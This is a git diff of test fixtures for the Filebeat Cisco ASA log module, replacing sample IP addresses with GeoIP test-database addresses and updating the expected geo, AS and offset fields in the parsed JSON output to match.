-        "source.as.organization.name": "CDW Ltd",
+        "source.address": "81.2.69.143",
         "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
         "source.geo.country_iso_code": "GB",
         "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.5888,
-        "source.geo.location.lon": -0.0247,
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.region_iso_code": "GB-ENG",
         "source.geo.region_name": "England",
-        "source.ip": "91.240.17.178",
+        "source.ip": "81.2.69.143",
         "source.port": 7777,
         "tags": [
             "cisco-asa",
@@ -3696,7 +3647,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:91.240.17.178/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number",
+        "event.original": "%ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:81.2.69.143/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number",
         "event.reason": "Duplicate TCP SYN with different initial sequence number",
         "event.severity": 4,
         "event.timezone": "-02:00",
@@ -3707,7 +3658,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 10584,
+        "log.offset": 10671,
         "network.protocol": "tcp",
         "observer.egress.interface.name": "destinationInterfaceName",
         "observer.hostname": "dev01",
@@ -3720,21 +3671,19 @@
         ],
         "related.ip": [
             "192.168.2.2",
-            "91.240.17.178"
+            "81.2.69.143"
         ],
         "service.type": "cisco",
-        "source.address": "91.240.17.178",
-        "source.as.number": 201126,
-        "source.as.organization.name": "CDW Ltd",
+        "source.address": "81.2.69.143",
         "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
         "source.geo.country_iso_code": "GB",
         "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.5888,
-        "source.geo.location.lon": -0.0247,
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.region_iso_code": "GB-ENG",
         "source.geo.region_name": "England",
-        "source.ip": "91.240.17.178",
+        "source.ip": "81.2.69.143",
         "source.port": 7777,
         "tags": [
             "cisco-asa",
@@ -3750,7 +3699,7 @@
         "event.code": 602303,
         "event.dataset": "cisco.asa",
         "event.module": "cisco",
-        "event.original": "%ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 91.240.17.178 and 192.168.2.2 (user= admin) has been created.",
+        "event.original": "%ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.143 and 192.168.2.2 (user= admin) has been created.",
         "event.outcome": "success",
         "event.severity": 6,
         "event.timezone": "-02:00",
@@ -3758,7 +3707,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 10775,
+        "log.offset": 10860,
         "network.direction": "outbound",
         "network.type": "ipsec",
         "observer.hostname": "dev01",
@@ -3770,24 +3719,22 @@
         ],
         "related.ip": [
             "192.168.2.2",
-            "91.240.17.178"
+            "81.2.69.143"
         ],
         "related.user": [
             "admin"
         ],
         "service.type": "cisco",
-        "source.address": "91.240.17.178",
-        "source.as.number": 201126,
-        "source.as.organization.name": "CDW Ltd",
+        "source.address": "81.2.69.143",
         "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
         "source.geo.country_iso_code": "GB",
         "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.5888,
-        "source.geo.location.lon": -0.0247,
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.region_iso_code": "GB-ENG",
         "source.geo.region_name": "England",
-        "source.ip": "91.240.17.178",
+        "source.ip": "81.2.69.143",
         "tags": [
             "cisco-asa",
             "forwarded"
@@ -3807,7 +3754,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 91.240.17.178 and 192.168.2.2 (user= admin) has been deleted.",
+        "event.original": "%ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.143 and 192.168.2.2 (user= admin) has been deleted.",
         "event.outcome": "success",
         "event.severity": 6,
         "event.timezone": "-02:00",
@@ -3821,7 +3768,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 10937,
+        "log.offset": 11020,
         "network.direction": "outbound",
         "network.type": "ipsec",
         "observer.hostname": "dev01",
@@ -3833,24 +3780,22 @@
         ],
         "related.ip": [
             "192.168.2.2",
-            "91.240.17.178"
+            "81.2.69.143"
         ],
         "related.user": [
             "admin"
         ],
         "service.type": "cisco",
-        "source.address": "91.240.17.178",
-        "source.as.number": 201126,
-        "source.as.organization.name": "CDW Ltd",
+        "source.address": "81.2.69.143",
         "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
         "source.geo.country_iso_code": "GB",
         "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.5888,
-        "source.geo.location.lon": -0.0247,
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.region_iso_code": "GB-ENG",
         "source.geo.region_name": "England",
-        "source.ip": "91.240.17.178",
+        "source.ip": "81.2.69.143",
         "tags": [
             "cisco-asa",
             "forwarded"
@@ -3870,7 +3815,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-5-750002: Local:91.240.17.178:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request",
+        "event.original": "%ASA-5-750002: Local:81.2.69.143:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request",
         "event.reason": "Received a IKE_INIT_SA request",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -3882,7 +3827,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "notification",
-        "log.offset": 11099,
+        "log.offset": 11180,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -3892,24 +3837,22 @@
         ],
         "related.ip": [
             "192.168.2.2",
-            "91.240.17.178"
+            "81.2.69.143"
         ],
         "related.user": [
             "admin"
         ],
         "service.type": "cisco",
-        "source.address": "91.240.17.178",
-        "source.as.number": 201126,
-        "source.as.organization.name": "CDW Ltd",
+        "source.address": "81.2.69.143",
         "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
         "source.geo.country_iso_code": "GB",
         "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.5888,
-        "source.geo.location.lon": -0.0247,
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.region_iso_code": "GB-ENG",
         "source.geo.region_name": "England",
-        "source.ip": "91.240.17.178",
+        "source.ip": "81.2.69.143",
         "source.port": 7777,
         "tags": [
             "cisco-asa",
@@ -3930,7 +3873,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-4-750003: Local:91.240.17.178:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database",
+        "event.original": "%ASA-4-750003: Local:81.2.69.143:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database",
         "event.reason": "Negotiation aborted due to Failed to locate an item in the database",
         "event.severity": 4,
         "event.timezone": "-02:00",
@@ -3941,7 +3884,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 11237,
+        "log.offset": 11316,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -3951,24 +3894,22 @@
         ],
         "related.ip": [
             "192.168.2.2",
-            "91.240.17.178"
+            "81.2.69.143"
         ],
         "related.user": [
             "admin"
         ],
         "service.type": "cisco",
-        "source.address": "91.240.17.178",
-        "source.as.number": 201126,
-        "source.as.organization.name": "CDW Ltd",
+        "source.address": "81.2.69.143",
         "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
         "source.geo.country_iso_code": "GB",
         "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.5888,
-        "source.geo.location.lon": -0.0247,
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
         "source.geo.region_iso_code": "GB-ENG",
         "source.geo.region_name": "England",
-        "source.ip": "91.240.17.178",
+        "source.ip": "81.2.69.143",
         "source.port": 7777,
         "tags": [
             "cisco-asa",
@@ -3987,7 +3928,7 @@
         "event.id": "bbe383e88",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-5-713120: Group = 100.60.140.10, IP = 192.128.1.1, PHASE 2 COMPLETED (msgid=bbe383e88)",
+        "event.original": "%ASA-5-713120: Group = 100.60.140.10, IP = 67.43.156.12, PHASE 2 COMPLETED (msgid=bbe383e88)",
         "event.outcome": "success",
         "event.reason": "PHASE 2 COMPLETED",
         "event.severity": 5,
@@ -4000,7 +3941,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "notification",
-        "log.offset": 11419,
+        "log.offset": 11496,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -4009,16 +3950,17 @@
             "dev01"
         ],
         "related.ip": [
-            "192.128.1.1"
+            "67.43.156.12"
         ],
         "service.type": "cisco",
-        "source.address": "192.128.1.1",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "192.128.1.1",
+        "source.address": "67.43.156.12",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "cisco-asa",
             "forwarded"
@@ -4034,7 +3976,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-5-713202: IP = 192.64.157.61, Duplicate first packet detected. Ignoring packet.",
+        "event.original": "%ASA-5-713202: IP = 1.128.3.4, Duplicate first packet detected. Ignoring packet.",
         "event.reason": "Duplicate first packet detected",
         "event.severity": 5,
         "event.timezone": "-02:00",
@@ -4045,7 +3987,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "notification",
-        "log.offset": 11539,
+        "log.offset": 11617,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -4054,16 +3996,13 @@
             "dev01"
         ],
         "related.ip": [
-            "192.64.157.61"
+            "1.128.3.4"
         ],
         "service.type": "cisco",
-        "source.address": "192.64.157.61",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "192.64.157.61",
+        "source.address": "1.128.3.4",
+        "source.as.number": 1221,
+        "source.as.organization.name": "Telstra Pty Ltd",
+        "source.ip": "1.128.3.4",
         "tags": [
             "cisco-asa",
             "forwarded"
@@ -4079,7 +4018,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-6-713905: Group = 100.60.140.10, IP = 192.128.1.1, All IPSec SA proposals found unacceptable!",
+        "event.original": "%ASA-6-713905: Group = 100.60.140.10, IP = 67.43.156.12, All IPSec SA proposals found unacceptable!",
         "event.outcome": "failure",
         "event.reason": "All IPSec SA proposals found unacceptable!",
         "event.severity": 6,
@@ -4092,7 +4031,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 11652,
+        "log.offset": 11726,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -4101,16 +4040,17 @@
             "dev01"
         ],
         "related.ip": [
-            "192.128.1.1"
+            "67.43.156.12"
         ],
         "service.type": "cisco",
-        "source.address": "192.128.1.1",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "192.128.1.1",
+        "source.address": "67.43.156.12",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "cisco-asa",
             "forwarded"
@@ -4139,7 +4079,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 11779,
+        "log.offset": 11854,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -4163,7 +4103,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-6-713903: IP = 192.128.1.1, All IPSec SA proposals found unacceptable!",
+        "event.original": "%ASA-6-713903: IP = 67.43.156.12, All IPSec SA proposals found unacceptable!",
         "event.severity": 6,
         "event.timezone": "-02:00",
         "event.type": [
@@ -4173,7 +4113,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 11865,
+        "log.offset": 11940,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -4210,7 +4150,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 11969,
+        "log.offset": 12045,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -4234,7 +4174,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-6-713901: Group = 100.60.140.10, IP = 192.128.1.1, All IPSec SA proposals found unacceptable!",
+        "event.original": "%ASA-6-713901: Group = 100.60.140.10, IP = 67.43.156.12, All IPSec SA proposals found unacceptable!",
         "event.outcome": "failure",
         "event.reason": "All IPSec SA proposals found unacceptable!",
         "event.severity": 6,
@@ -4247,7 +4187,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 12078,
+        "log.offset": 12154,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -4256,16 +4196,17 @@
             "dev01"
         ],
         "related.ip": [
-            "192.128.1.1"
+            "67.43.156.12"
         ],
         "service.type": "cisco",
-        "source.address": "192.128.1.1",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "192.128.1.1",
+        "source.address": "67.43.156.12",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "tags": [
             "cisco-asa",
             "forwarded"
@@ -4281,7 +4222,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-5-713049: Group = 100.60.140.10, Username = test_user, IP = 1.2.3.4, Security negotiation complete for User (test_user) Responder, Inbound SPI = 0x0000000, Outbound SPI = 0x0000000",
+        "event.original": "%ASA-5-713049: Group = 100.60.140.10, Username = test_user, IP = 81.2.69.143, Security negotiation complete for User (test_user) Responder, Inbound SPI = 0x0000000, Outbound SPI = 0x0000000",
         "event.severity": 5,
         "event.timezone": "-02:00",
         "event.type": [
@@ -4291,7 +4232,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "notification",
-        "log.offset": 12205,
+        "log.offset": 12282,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -4300,22 +4241,22 @@
             "dev01"
         ],
         "related.ip": [
-            "1.2.3.4"
+            "81.2.69.143"
         ],
         "related.user": [
             "test_user"
         ],
         "service.type": "cisco",
-        "source.address": "1.2.3.4",
-        "source.geo.city_name": "Moscow",
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "RU",
-        "source.geo.country_name": "Russia",
-        "source.geo.location.lat": 55.7527,
-        "source.geo.location.lon": 37.6172,
-        "source.geo.region_iso_code": "RU-MOW",
-        "source.geo.region_name": "Moscow",
-        "source.ip": "1.2.3.4",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "cisco-asa",
             "forwarded"
@@ -4349,7 +4290,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 12414,
+        "log.offset": 12495,
         "network.community_id": "1:Uo11LCySQ1S0c9jtHZVIb4Pm/2k=",
         "network.iana_number": 47,
         "observer.egress.interface.name": "inside",
@@ -4388,7 +4329,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-4-106023: Deny icmp src OUTSIDE:2a05:d016:add:4002:91f2:a9b2:e09a:6fc6 dst OUTSIDE:fe00:afa0::1 (type 128, code 0) by access-group \"OUTSIDE_in\"",
+        "event.original": "%ASA-4-106023: Deny icmp src OUTSIDE:2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 dst OUTSIDE:fe00:afa0::1 (type 128, code 0) by access-group \"OUTSIDE_in\"",
         "event.outcome": "failure",
         "event.severity": 4,
         "event.timezone": "-02:00",
@@ -4400,8 +4341,8 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 12550,
-        "network.community_id": "1:VA3lwFPBuRus2kxMs1BexFp+gp4=",
+        "log.offset": 12631,
+        "network.community_id": "1:vW44peXVlakl8z8Pk6oaF4JDxm8=",
         "network.iana_number": 1,
         "network.transport": "icmp",
         "observer.egress.interface.name": "OUTSIDE",
@@ -4414,22 +4355,17 @@
             "dev01"
         ],
         "related.ip": [
-            "2a05:d016:add:4002:91f2:a9b2:e09a:6fc6",
+            "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
             "fe00:afa0::1"
         ],
         "service.type": "cisco",
-        "source.address": "2a05:d016:add:4002:91f2:a9b2:e09a:6fc6",
-        "source.as.number": 16509,
-        "source.as.organization.name": "Amazon.com, Inc.",
-        "source.geo.city_name": "Stockholm",
+        "source.address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "SE",
-        "source.geo.country_name": "Sweden",
-        "source.geo.location.lat": 59.3333,
-        "source.geo.location.lon": 18.05,
-        "source.geo.region_iso_code": "SE-AB",
-        "source.geo.region_name": "Stockholm",
-        "source.ip": "2a05:d016:add:4002:91f2:a9b2:e09a:6fc6",
+        "source.geo.country_iso_code": "NO",
+        "source.geo.country_name": "Norway",
+        "source.geo.location.lat": 62.0,
+        "source.geo.location.lon": 10.0,
+        "source.ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6",
         "tags": [
             "cisco-asa",
             "forwarded"
@@ -4440,18 +4376,10 @@
         "cisco.asa.destination_interface": "identity",
         "cisco.asa.message_id": "302016",
         "cisco.asa.source_interface": "OUTSIDE",
-        "destination.address": "85.0.0.1",
-        "destination.as.number": 3303,
-        "destination.as.organization.name": "Bluewin",
-        "destination.geo.city_name": "Kolliken",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "CH",
-        "destination.geo.country_name": "Switzerland",
-        "destination.geo.location.lat": 47.3388,
-        "destination.geo.location.lon": 8.0264,
-        "destination.geo.region_iso_code": "CH-AG",
-        "destination.geo.region_name": "Aargau",
-        "destination.ip": "85.0.0.1",
+        "destination.address": "1.128.3.4",
+        "destination.as.number": 1221,
+        "destination.as.organization.name": "Telstra Pty Ltd",
+        "destination.ip": "1.128.3.4",
         "destination.port": 500,
         "event.action": "flow-expiration",
         "event.category": [
@@ -4463,7 +4391,7 @@
         "event.end": "2020-04-27T02:03:03.000-02:00",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-4-302016: Teardown UDP connection 123364823 for OUTSIDE:82.0.0.1/500 to identity:85.0.0.1/500 duration 92:24:20 bytes 4671944",
+        "event.original": "%ASA-4-302016: Teardown UDP connection 123364823 for OUTSIDE:67.43.156.13/500 to identity:1.128.3.4/500 duration 92:24:20 bytes 4671944",
         "event.severity": 4,
         "event.start": "2020-04-23T07:38:43.000Z",
         "event.timezone": "-02:00",
@@ -4475,9 +4403,9 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 12727,
+        "log.offset": 12808,
         "network.bytes": 4671944,
-        "network.community_id": "1:rwM9yFUsWh6N2utKviU7S94dS9U=",
+        "network.community_id": "1:ta82v3m+2fof9auTYfgRKH53JMY=",
         "network.iana_number": 17,
         "network.transport": "udp",
         "observer.egress.interface.name": "identity",
@@ -4490,19 +4418,18 @@
             "dev01"
         ],
         "related.ip": [
-            "82.0.0.1",
-            "85.0.0.1"
+            "1.128.3.4",
+            "67.43.156.13"
         ],
         "service.type": "cisco",
-        "source.address": "82.0.0.1",
-        "source.as.number": 5089,
-        "source.as.organization.name": "Virgin Media Limited",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "GB",
-        "source.geo.country_name": "United Kingdom",
-        "source.geo.location.lat": 51.4964,
-        "source.geo.location.lon": -0.1224,
-        "source.ip": "82.0.0.1",
+        "source.address": "67.43.156.13",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.port": 500,
         "tags": [
             "cisco-asa",
@@ -4536,7 +4463,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 12886,
+        "log.offset": 12972,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -4577,7 +4504,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 13116,
+        "log.offset": 13202,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -4618,7 +4545,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 13351,
+        "log.offset": 13437,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
@@ -4659,7 +4586,7 @@
         "host.hostname": "dev01",
         "input.type": "log",
         "log.level": "warning",
-        "log.offset": 13593,
+        "log.offset": 13679,
         "observer.hostname": "dev01",
         "observer.product": "asa",
         "observer.type": "firewall",
diff --git a/x-pack/filebeat/module/cisco/asa/test/asa-fix.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/asa-fix.log-expected.json
index 9335237a31b6..0156348bd70f 100644
--- a/x-pack/filebeat/module/cisco/asa/test/asa-fix.log-expected.json
+++ b/x-pack/filebeat/module/cisco/asa/test/asa-fix.log-expected.json
@@ -520,13 +520,6 @@
         "cisco.asa.rule_name": "filter",
         "cisco.asa.source_interface": "inside",
         "destination.address": "1.2.33.40",
-        "destination.geo.continent_name": "Asia",
-        "destination.geo.country_iso_code": "CN",
-        "destination.geo.country_name": "China",
-        "destination.geo.location.lat": 23.1167,
-        "destination.geo.location.lon": 113.25,
-        "destination.geo.region_iso_code": "CN-GD",
-        "destination.geo.region_name": "Guangdong",
         "destination.ip": "1.2.33.40",
         "destination.port": 8080,
         "event.action": "firewall-rule",
diff --git a/x-pack/filebeat/module/cisco/asa/test/dap_records.log b/x-pack/filebeat/module/cisco/asa/test/dap_records.log
index a02a1136b19d..950061569df0 100644
--- a/x-pack/filebeat/module/cisco/asa/test/dap_records.log
+++ b/x-pack/filebeat/module/cisco/asa/test/dap_records.log
@@ -1 +1 @@
-Feb 20 2020 16:11:11: %ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 1.2.3.4, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2
+Feb 20 2020 16:11:11: %ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 81.2.69.143, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2
diff --git a/x-pack/filebeat/module/cisco/asa/test/dap_records.log-expected.json b/x-pack/filebeat/module/cisco/asa/test/dap_records.log-expected.json
index e86dd81aead3..f1aa148f9cf8 100644
--- a/x-pack/filebeat/module/cisco/asa/test/dap_records.log-expected.json
+++ b/x-pack/filebeat/module/cisco/asa/test/dap_records.log-expected.json
@@ -14,7 +14,7 @@
         "event.dataset": "cisco.asa",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "%ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 1.2.3.4, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2",
+        "event.original": "%ASA-6-734001: DAP: User firsname.lastname@domain.net, Addr 81.2.69.143, Connection AnyConnect: The following DAP records were selected for this connection: dap_1, dap_2",
         "event.severity": 6,
         "event.timezone": "-02:00",
         "event.type": [
@@ -28,19 +28,19 @@
         "observer.type": "firewall",
         "observer.vendor": "Cisco",
         "related.ip": [
-            "1.2.3.4"
+            "81.2.69.143"
         ],
         "service.type": "cisco",
-        "source.address": "1.2.3.4",
-        "source.geo.city_name": "Moscow",
+        "source.address": "81.2.69.143",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "RU",
-        "source.geo.country_name": "Russia",
-        "source.geo.location.lat": 55.7527,
-        "source.geo.location.lon": 37.6172,
-        "source.geo.region_iso_code": "RU-MOW",
-        "source.geo.region_name": "Moscow",
-        "source.ip": "1.2.3.4",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "cisco-asa",
             "forwarded"
diff --git a/x-pack/filebeat/module/cisco/asa/test/sample.log b/x-pack/filebeat/module/cisco/asa/test/sample.log
index 6553ffa18efd..e662031d34dd 100644
--- a/x-pack/filebeat/module/cisco/asa/test/sample.log
+++ b/x-pack/filebeat/module/cisco/asa/test/sample.log
@@ -69,19 +69,19 @@ Jan 14 2015 13:16:14: %ASA-4-338008: Dynamic Filter dropped blacklisted TCP traf
 Nov 16 2009 14:12:35: %ASA-5-304001: 10.30.30.30 Accessed URL 192.0.2.1:/app
 Nov 16 2009 14:12:36: %ASA-5-304001: 10.5.111.32 Accessed URL 192.0.2.32:http://example.com
 Nov 16 2009 14:12:37: %ASA-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.0.0.19 on interface inside
-Jan 13 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (1.2.3.4/49926)(LOCAL\username) to vlan-42:1.2.3.4/80 (1.2.3.4/80) (username)
+Jan 13 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (81.2.69.143/49926)(LOCAL\username) to vlan-42:81.2.69.143/80 (81.2.69.143/80) (username)
 Jan 13 2021 19:12:37: %ASA-5-304001: USER001@192.168.0.1(LOCAL\USER001) Accessed URL 172.17.6.211:http://testingserver.com/somewebpage.html
-Jan 13 2021 19:12:37: %ASA-5-302013: Built inbound TCP connection 195207391 for OUTSIDE:85.0.0.1/12312 (62.0.0.1/34534)(LOCAL\USER001) to OUTSIDE:81.0.0.1/443 (81.0.0.1/443) (USER001)
-Jan 13 2021 19:12:37: %ASA-5-302013: Built inbound TCP connection 195207391 for OUTSIDE:85.0.0.1/12312 (62.0.0.1/34534)(LOCAL\user@domain.tld) to OUTSIDE:81.0.0.1/443 (81.0.0.1/443) (user@domain.tld)
-Jan 13 2021 19:12:37: %ASA-5-302020: Built inbound ICMP connection for faddr 85.0.0.1/0(LOCAL\USER001) gaddr 81.0.0.1/0 laddr 81.0.0.1/0 (USER001) type 3 code 3
-Jan 13 2021 19:12:37: %ASA-5-302020: Built inbound ICMP connection for faddr 85.0.0.1/0(LOCAL\user@domain.tld) gaddr 81.0.0.1/0 laddr 81.0.0.1/0 (user@domain.tld) type 3 code 3
-Jan 13 2021 19:12:37: %ASA-5-302020: Built inbound ICMP connection for faddr 85.0.0.1/0(AD\USER002) gaddr 81.0.0.1/0 laddr 81.0.0.1/0 (USER002) type 3 code 3
+Jan 13 2021 19:12:37: %ASA-5-302013: Built inbound TCP connection 195207391 for OUTSIDE:1.128.3.4/12312 (62.0.0.1/34534)(LOCAL\USER001) to OUTSIDE:89.160.20.156/443 (89.160.20.156/443) (USER001)
+Jan 13 2021 19:12:37: %ASA-5-302013: Built inbound TCP connection 195207391 for OUTSIDE:1.128.3.4/12312 (62.0.0.1/34534)(LOCAL\user@domain.tld) to OUTSIDE:89.160.20.156/443 (89.160.20.156/443) (user@domain.tld)
